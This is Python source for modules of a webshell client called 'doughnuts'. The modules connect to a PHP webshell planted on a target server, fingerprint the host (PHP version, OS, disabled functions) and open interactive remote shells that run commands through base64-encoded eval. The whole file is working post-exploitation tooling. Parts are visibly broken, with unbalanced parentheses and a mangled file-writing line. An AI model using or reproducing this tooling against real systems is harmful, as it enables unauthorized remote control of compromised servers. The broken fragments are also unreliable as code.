def run(*commands): """ shell Get a temporary shell of target system by system function or just run a shell command. """ command = str(value_translation(gget("raw_command_args"))) if (command): res = send(get_system_code(command)) if (not res): return print("\nResult:\n\n") + res.r_text.strip() + "\n") return print( color.cyan( "Eenter interactive temporary shell...\n\nUse 'back' command to return doughnuts.\n" )) res = send( f'{get_system_code("whoami")}print("@".$_SERVER["SERVER_NAME"]."|".getcwd());' ).r_text.strip() prompt, pwd = res.split("|") set_namespace("webshell", False, True) wordlist = gget("webshell.wordlist") readline.set_wordlist(NEW_WINDOWS_WORDLIST if ( is_windows()) else NEW_UNIX_WORDLIST) if is_windows(): prompt = "%s> " else: prompt = prompt.replace("\r", "").replace("\n", "") + ":%s$ " try: while gget("loop"): print(prompt % pwd, end="") command = str(value_translation(readline())) lower_command = command.lower() if (lower_command.lower() in ['exit', 'quit', 'back']): print() break if (command == ''): print() continue b64_pwd = base64_encode(pwd) if (lower_command.startswith("cd ") and len(lower_command) > 3): path = base64_encode(lower_command[3:].strip()) res = send( f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());' ) if (not res): return pwd = res.r_text.strip() else: res = send(f'chdir(base64_decode(\'{b64_pwd}\'));' + get_system_code(command)) if (not res): return print("\n" + res.r_text.strip() + "\n") finally: readline.set_wordlist(wordlist)
def run(*commands): """ webshell Get a webshell of target system or just run a webshell command. """ command = str(value_translation(gget("raw_command_args"))) if (command): res = send((command)) if (not res): return print("\nResult:\n\n") + res.r_text.strip() + "\n") return print(color.cyan("Eenter interactive temporary webshell...\n\nUse 'back' command to return doughnuts.\n")) pwd = send(f'print(getcwd());').r_text.strip() set_namespace("webshell", False, True) wordlist = gget("webshell.wordlist") readline.set_wordlist(NEW_WORDLIST) try: while gget("loop"): print(f"webshell:{pwd} >> ", end="") command = str(value_translation(readline(b"("))) lower_command = command.lower() if (lower_command.lower() in ['exit', 'quit', 'back']): print() break if (command == ''): print() continue command = base64_encode(command) b64_pwd = base64_encode(pwd) if (lower_command.startswith("cd ") and len(lower_command) > 3): path = base64_encode(lower_command[3:].strip()) res = send(f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());') if (not res): return pwd = res.r_text.strip() else: res = send(f'eval("chdir(base64_decode(\'{b64_pwd}\'));eval(base64_decode(\'{command}\'));");') if (not res): return print("\n" + res.r_text.strip() + "\n") finally: readline.set_wordlist(wordlist)
def run(*coomands): """ lsh Run a command on local machine. """ command = str(value_translation(gget("raw_command_args"))) if (command): if (command.startswith("cd ")): chdir(command[3:]) print("\nResult:\n\n") + "current working directory:\n\n " + getcwd() + "\n") else: print("\nResult:\n")) system(command) print()
def run(url: str, method: str = "GET", pwd: str = "pass", *encoders_or_params): """ connect Connect a webshell of php. eg: connect {url} {method} {pass} {encoders_or_params...} """ method = str(method).upper() params_dict = {"headers": {}} if method == "GET": raw_key = "params" elif method == "POST": raw_key = "data" elif method == "COOKIE": raw_key = "cookies" elif method == "HEADER": raw_key = "headers" else: print("Method error")) return if (is_windows(False)): new_eop = [] extra_params = [] pass_next = False eop_len = len(encoders_or_params) for i in range(eop_len): # 清洗数据,解决windows下a=b传成2个参数的错误 v = str(encoders_or_params[i]) if (pass_next): pass_next = False continue if (":" not in v): new_eop.append(str(v)) elif (i < eop_len - 1): extra_params.append(v + "=" + str(encoders_or_params[i + 1])) pass_next = True encoders_or_params = new_eop extra_params = [f for f in encoders_or_params if "=" in str(f)] params_dict[raw_key] = {} for each in extra_params: if (":" in each): k, data = each.split(":") if (k not in params_dict): params_dict[k] = {} params_dict[k].update( dict([(k, value_translation(v[0])) for k, v in parse_qs(data).items()])) else: k, data = each.split("=") if (k not in params_dict): params_dict[k] = {} if (k == "auth"): params_dict[k] = value_translation(data) webshell_netloc = urlparse(url).netloc gset("webshell.url", url, namespace="webshell") gset("webshell.params_dict", params_dict, namespace="webshell") gset("webshell.password", str(pwd), namespace="webshell") gset("webshell.method", raw_key, namespace="webshell") gset("webshell.encode_functions", encoders_or_params, namespace="webshell") gset("webshell.netloc", webshell_netloc, namespace="webshell") gset( "webshell.download_path", path.join(gget("root_path"), "target", webshell_netloc.replace(":", "_")), namespace="webshell", ) gset("webshell.pwd", ".", namespace="webshell") gset("webshell.bypass_df", -1, namespace="webshell") res = send('print("c4ca4238a0b923820d|".phpversion()."|cc509a6f75849b");', raw=True) if (not res or "c4ca4238a0b923820d" not in res.r_text): print("Connect failed...")) if (res): print(res.r_text) return False if ('7.' in res.r_text): gset("webshell.v7", True, namespace="webshell") if "c4ca4238a0b923820d" in res.r_text: # 验证是否成功连接 gset("webshell.php_version", res.r_text.split("c4ca4238a0b923820d|")[1].split( "|cc509a6f75849b")[0], namespace="webshell") info_req = send( """print($_SERVER['DOCUMENT_ROOT'].'|'.php_uname().'|'.$_SERVER['SERVER_SOFTWARE'].'|'.getcwd().'|'.ini_get('upload_tmp_dir').'|'.ini_get('disable_functions').'|'.ini_get('open_basedir'));""" ) info = info_req.r_text.strip().split("|") exec_func = send(get_detectd_exec_php()).r_text.strip() prepare_system_template(exec_func) gset("webshell.root", info[0], namespace="webshell") gset("webshell.os_version", info[1], namespace="webshell") gset( "webshell.iswin", (True if "win" in info[1].lower() else False), namespace="webshell", ) gset("webshell.server_version", info[2], namespace="webshell") gset("webshell.pwd", info[3], namespace="webshell") gset("webshell.prompt", f"doughnuts ({color.cyan(webshell_netloc)}) > ") gset("webshell.exec_func", exec_func, namespace="webshell") upload_tmp_dir = info[4] if (not upload_tmp_dir): if (not is_windows()): upload_tmp_dir = "/tmp/" else: if (is_windows()): upload_tmp_dir += "\\\\" else: upload_tmp_dir += "/" gset("webshell.upload_tmp_dir", upload_tmp_dir, namespace="webshell") disable_function_list = [f.strip() for f in info[5].split(",")] if ('' in disable_function_list): disable_function_list.remove('') gset("webshell.obd", info[6], namespace="webshell") gset("webshell.disable_functions", disable_function_list, namespace="webshell") root_path = gget("root_path") from_log = gget("webshell.from_log", "webshell") if not from_log: extra = "|".join(encoders_or_params) + \ "|" if encoders_or_params else "" with open(path.join(root_path, "webshell.log"), "ab+") as f: text = if (text):, SEEK_END) if != b"\n": f.write(b"\n") f.write(f"{url}|{method}|{pwd}|{extra}\n".encode()) else: gset("webshell.from_log", False, True, "webshell") print(color.cyan("Connect success...\n")) print_webshell_info() set_namespace("webshell", callback=False) if (exec_func == ''): print("No system execute function\n")) return True